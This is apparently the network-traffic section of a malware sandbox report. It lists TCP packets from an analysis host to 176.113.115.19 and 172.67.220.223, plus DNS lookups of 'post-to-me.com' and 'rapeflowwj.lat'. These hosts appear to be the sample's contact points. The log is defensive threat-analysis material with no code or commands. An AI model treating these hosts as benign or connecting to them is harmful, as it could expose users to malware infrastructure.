Dec 18, 2024 13:49:28.567699909 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.567763090 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:28.567806959 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.567852974 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:28.570231915 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.570245028 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.570281982 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:28.570312023 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:28.572573900 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.572618961 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:28.572717905 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.572766066 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:28.574595928 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.574639082 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:28.574702978 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.574749947 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:28.576436043 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.576479912 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:28.576487064 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.576533079 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:28.578752995 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.578804970 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:28.578903913 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.578972101 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:28.580915928 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.580965042 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:28.581091881 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.581135035 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:28.583350897 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.583404064 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:28.583467007 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.583503008 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:28.585200071 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.585273981 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:28.585289001 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.585328102 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:28.587086916 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.587130070 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:28.587218046 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.587258101 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:28.589113951 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.589162111 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:28.589229107 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.589267969 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:28.591815948 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.591829062 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.591861010 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:28.591878891 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:28.593772888 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.593818903 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.593822002 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:28.593853951 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:28.596010923 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.596060991 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:28.596129894 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.596168041 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:28.598371029 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.598412991 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:28.598944902 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.599003077 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:28.600644112 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.600689888 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:28.600693941 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.600730896 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:28.602956057 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.602969885 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.603002071 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:28.603019953 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:28.605187893 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.605232000 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:28.605355024 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.605398893 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:28.607469082 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.607511997 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:28.607551098 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.607599020 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:28.610071898 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.610114098 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:28.610200882 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.610238075 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:28.612158060 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.612200022 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:28.612226009 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.612263918 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:28.614782095 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.614795923 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.614825010 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:28.614841938 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:28.616637945 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.616684914 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:28.688994884 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.689058065 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:28.689148903 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.689193010 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:28.690143108 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.690198898 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:28.690256119 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.690300941 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:28.691811085 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.691854000 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:28.691863060 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.691900015 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:28.693268061 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.693320990 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:28.693416119 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.693455935 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:28.695210934 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.695224047 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.695254087 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:28.695269108 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:28.697345972 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.697360039 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.697410107 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:28.698992968 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.699007988 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.699048042 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:28.699063063 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:28.700895071 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.700908899 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.700948954 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:28.700965881 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:28.702665091 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.702678919 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.702765942 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:28.704178095 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.704231024 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:28.704235077 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.704271078 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:28.705368996 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.705406904 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:28.705441952 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.705482960 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:28.707271099 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.707283974 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.707324028 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:28.707334995 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:28.709341049 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.709417105 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:28.709481955 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.709520102 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:28.711368084 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.711424112 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:28.711468935 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.711524963 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:28.712976933 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.712990046 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.713032007 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:28.714442968 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.714457035 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.714504004 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:28.714530945 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:28.715641022 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.715696096 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:28.715756893 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.715802908 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:28.716825008 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.716873884 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:28.716907978 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.716950893 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:28.718420982 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.718435049 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.718477011 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:28.718523026 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:28.720005989 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.720056057 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.720067024 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:28.720101118 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:28.721506119 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.721551895 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:28.721592903 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.721632957 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:28.723011017 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.723094940 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:28.723139048 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.723191977 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:28.724591970 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.724641085 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:28.724673986 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.724718094 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:28.726094961 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.726154089 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:28.726242065 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.726281881 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:28.727730989 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.727778912 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:28.727806091 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.727849007 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:28.729213953 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.729227066 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.729262114 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:28.729279041 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:28.730781078 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.730794907 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.730830908 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:28.732042074 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.732085943 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:28.732090950 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:28.732125998 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:31.999655008 CET	49706	443	192.168.2.8	172.67.220.223
Dec 18, 2024 13:49:31.999692917 CET	443	49706	172.67.220.223	192.168.2.8
Dec 18, 2024 13:49:31.999768972 CET	49706	443	192.168.2.8	172.67.220.223
Dec 18, 2024 13:49:32.001090050 CET	49706	443	192.168.2.8	172.67.220.223
Dec 18, 2024 13:49:32.001111984 CET	443	49706	172.67.220.223	192.168.2.8
Dec 18, 2024 13:49:33.125327110 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:33.125389099 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:33.272797108 CET	443	49706	172.67.220.223	192.168.2.8
Dec 18, 2024 13:49:33.272870064 CET	49706	443	192.168.2.8	172.67.220.223
Dec 18, 2024 13:49:33.276631117 CET	49706	443	192.168.2.8	172.67.220.223
Dec 18, 2024 13:49:33.276643991 CET	443	49706	172.67.220.223	192.168.2.8
Dec 18, 2024 13:49:33.276999950 CET	443	49706	172.67.220.223	192.168.2.8
Dec 18, 2024 13:49:33.319643974 CET	49706	443	192.168.2.8	172.67.220.223
Dec 18, 2024 13:49:33.331001043 CET	49706	443	192.168.2.8	172.67.220.223
Dec 18, 2024 13:49:33.331177950 CET	49706	443	192.168.2.8	172.67.220.223
Dec 18, 2024 13:49:33.331212044 CET	443	49706	172.67.220.223	192.168.2.8
Dec 18, 2024 13:49:33.991817951 CET	443	49706	172.67.220.223	192.168.2.8
Dec 18, 2024 13:49:33.991902113 CET	443	49706	172.67.220.223	192.168.2.8
Dec 18, 2024 13:49:33.991971016 CET	49706	443	192.168.2.8	172.67.220.223
Dec 18, 2024 13:49:33.994082928 CET	49706	443	192.168.2.8	172.67.220.223
Dec 18, 2024 13:49:33.994101048 CET	443	49706	172.67.220.223	192.168.2.8
Dec 18, 2024 13:49:34.002835989 CET	49707	443	192.168.2.8	172.67.220.223
Dec 18, 2024 13:49:34.002882004 CET	443	49707	172.67.220.223	192.168.2.8
Dec 18, 2024 13:49:34.002957106 CET	49707	443	192.168.2.8	172.67.220.223
Dec 18, 2024 13:49:34.003228903 CET	49707	443	192.168.2.8	172.67.220.223
Dec 18, 2024 13:49:34.003245115 CET	443	49707	172.67.220.223	192.168.2.8
Dec 18, 2024 13:49:35.220690012 CET	443	49707	172.67.220.223	192.168.2.8
Dec 18, 2024 13:49:35.220834970 CET	49707	443	192.168.2.8	172.67.220.223
Dec 18, 2024 13:49:35.222110987 CET	49707	443	192.168.2.8	172.67.220.223
Dec 18, 2024 13:49:35.222115993 CET	443	49707	172.67.220.223	192.168.2.8
Dec 18, 2024 13:49:35.222604036 CET	443	49707	172.67.220.223	192.168.2.8
Dec 18, 2024 13:49:35.224289894 CET	49707	443	192.168.2.8	172.67.220.223
Dec 18, 2024 13:49:35.224289894 CET	49707	443	192.168.2.8	172.67.220.223
Dec 18, 2024 13:49:35.224411964 CET	443	49707	172.67.220.223	192.168.2.8
Dec 18, 2024 13:49:36.045116901 CET	443	49707	172.67.220.223	192.168.2.8
Dec 18, 2024 13:49:36.045177937 CET	443	49707	172.67.220.223	192.168.2.8
Dec 18, 2024 13:49:36.045242071 CET	49707	443	192.168.2.8	172.67.220.223
Dec 18, 2024 13:49:36.045258045 CET	443	49707	172.67.220.223	192.168.2.8
Dec 18, 2024 13:49:36.045938969 CET	443	49707	172.67.220.223	192.168.2.8
Dec 18, 2024 13:49:36.045988083 CET	49707	443	192.168.2.8	172.67.220.223
Dec 18, 2024 13:49:36.045995951 CET	443	49707	172.67.220.223	192.168.2.8
Dec 18, 2024 13:49:36.053613901 CET	443	49707	172.67.220.223	192.168.2.8
Dec 18, 2024 13:49:36.053678989 CET	49707	443	192.168.2.8	172.67.220.223
Dec 18, 2024 13:49:36.053685904 CET	443	49707	172.67.220.223	192.168.2.8
Dec 18, 2024 13:49:36.061098099 CET	443	49707	172.67.220.223	192.168.2.8
Dec 18, 2024 13:49:36.061163902 CET	49707	443	192.168.2.8	172.67.220.223
Dec 18, 2024 13:49:36.061170101 CET	443	49707	172.67.220.223	192.168.2.8
Dec 18, 2024 13:49:36.068506956 CET	443	49707	172.67.220.223	192.168.2.8
Dec 18, 2024 13:49:36.068567991 CET	49707	443	192.168.2.8	172.67.220.223
Dec 18, 2024 13:49:36.068576097 CET	443	49707	172.67.220.223	192.168.2.8
Dec 18, 2024 13:49:36.116606951 CET	49707	443	192.168.2.8	172.67.220.223
Dec 18, 2024 13:49:36.166035891 CET	443	49707	172.67.220.223	192.168.2.8
Dec 18, 2024 13:49:36.210335016 CET	49707	443	192.168.2.8	172.67.220.223
Dec 18, 2024 13:49:36.210347891 CET	443	49707	172.67.220.223	192.168.2.8
Dec 18, 2024 13:49:36.245551109 CET	443	49707	172.67.220.223	192.168.2.8
Dec 18, 2024 13:49:36.245667934 CET	49707	443	192.168.2.8	172.67.220.223
Dec 18, 2024 13:49:36.245677948 CET	443	49707	172.67.220.223	192.168.2.8
Dec 18, 2024 13:49:36.249486923 CET	443	49707	172.67.220.223	192.168.2.8
Dec 18, 2024 13:49:36.249533892 CET	443	49707	172.67.220.223	192.168.2.8
Dec 18, 2024 13:49:36.249583960 CET	49707	443	192.168.2.8	172.67.220.223
Dec 18, 2024 13:49:36.249596119 CET	443	49707	172.67.220.223	192.168.2.8
Dec 18, 2024 13:49:36.249634981 CET	49707	443	192.168.2.8	172.67.220.223
Dec 18, 2024 13:49:36.249650955 CET	443	49707	172.67.220.223	192.168.2.8
Dec 18, 2024 13:49:36.249695063 CET	49707	443	192.168.2.8	172.67.220.223
Dec 18, 2024 13:49:36.258846998 CET	49707	443	192.168.2.8	172.67.220.223
Dec 18, 2024 13:49:36.258863926 CET	443	49707	172.67.220.223	192.168.2.8
Dec 18, 2024 13:49:36.258874893 CET	49707	443	192.168.2.8	172.67.220.223
Dec 18, 2024 13:49:36.258881092 CET	443	49707	172.67.220.223	192.168.2.8
Dec 18, 2024 13:49:36.909883022 CET	49708	443	192.168.2.8	172.67.220.223
Dec 18, 2024 13:49:36.909929037 CET	443	49708	172.67.220.223	192.168.2.8
Dec 18, 2024 13:49:36.910000086 CET	49708	443	192.168.2.8	172.67.220.223
Dec 18, 2024 13:49:36.910340071 CET	49708	443	192.168.2.8	172.67.220.223
Dec 18, 2024 13:49:36.910351038 CET	443	49708	172.67.220.223	192.168.2.8
Dec 18, 2024 13:49:38.123557091 CET	443	49708	172.67.220.223	192.168.2.8
Dec 18, 2024 13:49:38.123684883 CET	49708	443	192.168.2.8	172.67.220.223
Dec 18, 2024 13:49:38.124905109 CET	49708	443	192.168.2.8	172.67.220.223
Dec 18, 2024 13:49:38.124916077 CET	443	49708	172.67.220.223	192.168.2.8
Dec 18, 2024 13:49:38.125152111 CET	443	49708	172.67.220.223	192.168.2.8
Dec 18, 2024 13:49:38.126426935 CET	49708	443	192.168.2.8	172.67.220.223
Dec 18, 2024 13:49:38.126629114 CET	49708	443	192.168.2.8	172.67.220.223
Dec 18, 2024 13:49:38.126663923 CET	443	49708	172.67.220.223	192.168.2.8
Dec 18, 2024 13:49:38.972290039 CET	443	49708	172.67.220.223	192.168.2.8
Dec 18, 2024 13:49:38.972403049 CET	443	49708	172.67.220.223	192.168.2.8
Dec 18, 2024 13:49:38.972461939 CET	49708	443	192.168.2.8	172.67.220.223
Dec 18, 2024 13:49:38.972562075 CET	49708	443	192.168.2.8	172.67.220.223
Dec 18, 2024 13:49:38.972579002 CET	443	49708	172.67.220.223	192.168.2.8
Dec 18, 2024 13:49:39.153553963 CET	49711	443	192.168.2.8	172.67.220.223
Dec 18, 2024 13:49:39.153603077 CET	443	49711	172.67.220.223	192.168.2.8
Dec 18, 2024 13:49:39.153681993 CET	49711	443	192.168.2.8	172.67.220.223
Dec 18, 2024 13:49:39.154042006 CET	49711	443	192.168.2.8	172.67.220.223
Dec 18, 2024 13:49:39.154056072 CET	443	49711	172.67.220.223	192.168.2.8
Dec 18, 2024 13:49:40.368782043 CET	443	49711	172.67.220.223	192.168.2.8
Dec 18, 2024 13:49:40.368864059 CET	49711	443	192.168.2.8	172.67.220.223
Dec 18, 2024 13:49:40.370600939 CET	49711	443	192.168.2.8	172.67.220.223
Dec 18, 2024 13:49:40.370610952 CET	443	49711	172.67.220.223	192.168.2.8
Dec 18, 2024 13:49:40.370940924 CET	443	49711	172.67.220.223	192.168.2.8
Dec 18, 2024 13:49:40.372318029 CET	49711	443	192.168.2.8	172.67.220.223
Dec 18, 2024 13:49:40.372479916 CET	49711	443	192.168.2.8	172.67.220.223
Dec 18, 2024 13:49:40.372519970 CET	443	49711	172.67.220.223	192.168.2.8
Dec 18, 2024 13:49:40.372577906 CET	49711	443	192.168.2.8	172.67.220.223
Dec 18, 2024 13:49:40.415340900 CET	443	49711	172.67.220.223	192.168.2.8
Dec 18, 2024 13:49:41.130209923 CET	443	49711	172.67.220.223	192.168.2.8
Dec 18, 2024 13:49:41.130304098 CET	443	49711	172.67.220.223	192.168.2.8
Dec 18, 2024 13:49:41.130379915 CET	49711	443	192.168.2.8	172.67.220.223
Dec 18, 2024 13:49:41.130450964 CET	49711	443	192.168.2.8	172.67.220.223
Dec 18, 2024 13:49:41.472091913 CET	49714	443	192.168.2.8	172.67.220.223
Dec 18, 2024 13:49:41.472130060 CET	443	49714	172.67.220.223	192.168.2.8
Dec 18, 2024 13:49:41.472196102 CET	49714	443	192.168.2.8	172.67.220.223
Dec 18, 2024 13:49:41.472636938 CET	49714	443	192.168.2.8	172.67.220.223
Dec 18, 2024 13:49:41.472647905 CET	443	49714	172.67.220.223	192.168.2.8
Dec 18, 2024 13:49:42.726135015 CET	443	49714	172.67.220.223	192.168.2.8
Dec 18, 2024 13:49:42.726217031 CET	49714	443	192.168.2.8	172.67.220.223
Dec 18, 2024 13:49:42.727827072 CET	49714	443	192.168.2.8	172.67.220.223
Dec 18, 2024 13:49:42.727849007 CET	443	49714	172.67.220.223	192.168.2.8
Dec 18, 2024 13:49:42.728084087 CET	443	49714	172.67.220.223	192.168.2.8
Dec 18, 2024 13:49:42.735387087 CET	49714	443	192.168.2.8	172.67.220.223
Dec 18, 2024 13:49:42.735613108 CET	49714	443	192.168.2.8	172.67.220.223
Dec 18, 2024 13:49:42.735650063 CET	443	49714	172.67.220.223	192.168.2.8
Dec 18, 2024 13:49:42.735716105 CET	49714	443	192.168.2.8	172.67.220.223
Dec 18, 2024 13:49:42.735728979 CET	443	49714	172.67.220.223	192.168.2.8
Dec 18, 2024 13:49:44.394452095 CET	443	49714	172.67.220.223	192.168.2.8
Dec 18, 2024 13:49:44.394582987 CET	443	49714	172.67.220.223	192.168.2.8
Dec 18, 2024 13:49:44.394671917 CET	49714	443	192.168.2.8	172.67.220.223
Dec 18, 2024 13:49:44.394884109 CET	49714	443	192.168.2.8	172.67.220.223
Dec 18, 2024 13:49:44.394906044 CET	443	49714	172.67.220.223	192.168.2.8
Dec 18, 2024 13:51:13.710748911 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:51:14.024220943 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:51:14.647809982 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:51:15.882194042 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:51:18.335325003 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:51:23.227464914 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:51:32.991908073 CET	49705	80	192.168.2.8	176.113.115.19

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 18, 2024 13:49:23.732578039 CET	49327	53	192.168.2.8	1.1.1.1
Dec 18, 2024 13:49:23.997487068 CET	53	49327	1.1.1.1	192.168.2.8
Dec 18, 2024 13:49:31.512749910 CET	65277	53	192.168.2.8	1.1.1.1
Dec 18, 2024 13:49:31.994019985 CET	53	65277	1.1.1.1	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 18, 2024 13:49:23.732578039 CET	192.168.2.8	1.1.1.1	0x189d	Standard query (0)	post-to-me.com	A (IP address)	IN (0x0001)	false
Dec 18, 2024 13:49:31.512749910 CET	192.168.2.8	1.1.1.1	0xb75c	Standard query (0)	rapeflowwj.lat	A (IP address)	IN (0x0001)	false

DNS Answers

